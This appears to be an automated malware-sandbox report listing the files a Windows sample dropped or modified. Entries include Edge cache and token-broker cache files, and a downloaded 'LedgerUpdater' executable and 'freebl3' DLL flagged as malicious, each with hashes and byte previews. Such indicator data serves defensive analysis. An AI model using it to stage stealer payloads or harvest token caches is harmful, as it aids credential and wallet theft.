SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.0160329066530585
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclVOCWy:YWLSGTt1o9LuLgfGBPAzkVj/T8lh
MD5:	A5B51222D167C399D9DD2BC4C3FF31D5
SHA1:	188F7D7455988DC990B4BC362732F10DB5C1EF30
SHA-256:	FD62532C4AFEE2D9F145815915A2F7223E17784BE6F34853C868EBD489D30900
SHA-512:	D47DB2A2FADA6B5BD943CA9A8043F96252057E69690A7B6E272E1515B0EAFA7B24364F5A4AD6A1A8B8454129B155E8B312C18A395DADA8F49BCC9067958180C3
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1730674322740556}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
MD5:	F732DBED9289177D15E236D0F8F2DDD3
SHA1:	53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
SHA-256:	2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
SHA-512:	B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c56a48df-f0c6-4b47-a58e-a36e44356b72.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	57709
Entropy (8bit):	6.103778521764084
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yOpPGWv/sxtwuj7VLyMV/YoskFoz:z/0+zI7yORv/4KYVeZoskG
MD5:	9256559EF95A62EF15A1540A5A0BD9A9
SHA1:	58B99654BC79F15BFE40DA3DC12EE67E3CD36B6A
SHA-256:	2308B91887C5A52F0C8F88D3D437C431D05B3100430637130CEEC8DE14263C17
SHA-512:	DCEFC1C5848CBE091CE26D58CBCA6E7FA42034C9A4C9850203A29AF274EFC70A083940F454B786644178DBC44A120F4467B9B6DC6EEB72C0738A8F087605DE40
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f69607c4-6728-41e1-bdb1-aedc9c09d4d4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	59249
Entropy (8bit):	6.100323372475138
Encrypted:	false
SSDEEP:	1536:hMk1rT8Hnn/PGWv/sxtwuUoEzuTFow7VLyMV/Yosr:hMYrT8H/v/4KJo9hVVeZosr
MD5:	92A165064D65FE7F144426848D2008C7
SHA1:	64B28CDEED589871035021BAD982114ABCA4B3EC
SHA-256:	52A21317DB179A75166A3C87907EA8E72AFAF340DBA153038007E587A56FAD5E
SHA-512:	4153105DD4E7A42123D6BA762CA45259843D02EBE5C0706A4D972A8D24F1D271B14265A1DE10B9EE0F0DEE4712ADD558145989711D1CBDEE6FFA91A9DFBD033B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"23c6e320-8de9-4f8d-a3f0-2270130e633b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8424861238620305
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxGRxl9Il8uALCyB1ySEytmfdbPFSbQ9Ld1rc:mVlYWL5WgQfdjFSk9s
MD5:	5A34A8DF61AFEB576FA9AB0E2DD07A63
SHA1:	7ED08687FBB02A48725578D0B49994DA42B56F6D
SHA-256:	ABBDAA7FF5B6486DF53AA53203BE5A8AF6B186FA38A92F6A7EC1E06CC27DCD47
SHA-512:	5F400B8BE940F2ACBC6DB8968B997780C648EE03F1896BC66B1AC0C424398EA3F6F4ACFCD72E1D54F872B2DFBC7A915AFB6DE5F527D42C9771F2F80C69F898C1
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.F.1.g.r.2.A.t.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.J.D.u.v.0.W.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	4.000927425649542
Encrypted:	false
SSDEEP:	96:aYWLXzEnZRB6On8gsLQJnL0VGCudqo6C2m4zkF6:anMRcBUKVlurZAzkc
MD5:	FD93565992BF7F4BE58EF62F7EA8BD9B
SHA1:	F562028CB7023C3202680D0D3522EF5DF051FC34
SHA-256:	E04BA2825C40D5CFD86314BE97681BB2F0C20BA7F7BC725EF754AFBBC580C845
SHA-512:	8C16A04D87C5FEDBD02AD47F2C965C2C1CE5438B78B4B8735602880E7E2E792F9BDF5F750A784769D79294B7878D8BD8C3DE5671AD28D81948703798E7C2E7E2
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.i.M.i.l.V.g.t.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.J.D.u.v.0.W.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.915670038147862
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7xUxl9Il8uALC4/0w+n4T2h88Fg8i68LKNFJnhl4IHOzd/vc:a+YWLH/0wSlO682Jz4yOu
MD5:	5F75705111126F341F3F73001274A72B
SHA1:	E3257B6F9119165BB47408A43B74E148E271C48C
SHA-256:	949946A13BCA435FF810AD7F2E416A3AB34B784509E3F93E13E672B48843AA15
SHA-512:	148A7D1E2ABA346C5B8A13B9A3009A4ECAF2AE7D2D009A293BB1A536E2B7EB3890E58904F9BA9DCC186C93B2B636BBDE24CCB4DF5D55B126DCD09981624B8148
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".8.q.o.A.x.S.l.M.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.J.D.u.v.0.W.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\json[1].json

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3581
Entropy (8bit):	5.399033763049006
Encrypted:	false
SSDEEP:	96:6NnQOHQRNnQIbQZNnQBLK9QBskNnQfUiUWdgEQfUmNnQ4QeNnQVQpeDQVlNnQIw1:6NeNgNcL1BNUp72lN9Nece6lNf1NO
MD5:	D1F5A696FD81375A30D2E71907C17AC5
SHA1:	14ECD5B7EDF8B6A63C9B59758D087FA9C88F177C
SHA-256:	5879AA3139260E53489670BA64A7CB37F97018FC73B3BC53F03FC1A0C04DB354
SHA-512:	C0BBB4828769D1B40C148661B29E6737787B1ADB8BF430101037F272113F1EDB950224AB4A754A1E10F9DA583C1C1A24018C452BCBBD62D59B73EBC357E26DA9
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/B592D1CA2F82A1720B3F4C0BC7749D15",.. "id": "B592D1CA2F82A1720B3F4C0BC7749D15",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/B592D1CA2F82A1720B3F4C0BC7749D15"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/7B2AC5B92F3EB8D2356CE94BCE312C8E",.. "id": "7B2AC5B92F3EB8D2356CE94BCE312C8E",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/7B2AC5B92F3EB8D2356CE94BCE312C8E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LedgerUpdater[1].exe

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	109056
Entropy (8bit):	7.601271926021863
Encrypted:	false
SSDEEP:	1536:BICbUxKOcuS11Phbiyn2TCdfGyJVGJkyrt517EwM+UPTedxKOcuS11Phbiyn2TCf:2CbUsISnRGPJkGt74YsISnRF
MD5:	BA38615AB308EFBDB2A877277AB76CD0
SHA1:	DB1A7FB291820B7581F98CF0623462C431288E5E
SHA-256:	06A5989061AAC0564C43D883C74DC603F4489E149E04142D1BB7074B7E661BD1
SHA-512:	5FB878C7875C6F38664BF56389D432883933B2FF956FD9FA7475DA7926C4289C738FF7A1FB8A244D5E69F485B9520F678FFF90AE6673A9C15A4DE50A20518F54
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&..........."...0..2...v.......Q... ...`....@.. ....................................`.................................LQ..O....`.. s...........................P..8............................................ ............... ..H............text....1... ...2.................. ..`.rsrc... s...`...t...4..............@..@.reloc..............................@..B.................Q......H.......d0...9...........j..............................................>. 4......(....2......o....:........o.....0..,........o....r...p $...........%...%....o....t....&...o......(....J.r!..p.s....(....Js....%o....o....&..( ...6.(!....(.......0..$........{....,...}....rK..p.s.......("...f..3...t....}......}......(#....~....-.r...p.....($...o%...s&........~.....~............~......('...Vs....((...t...........{...."..}....*..0..G.......s).....(.......+....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
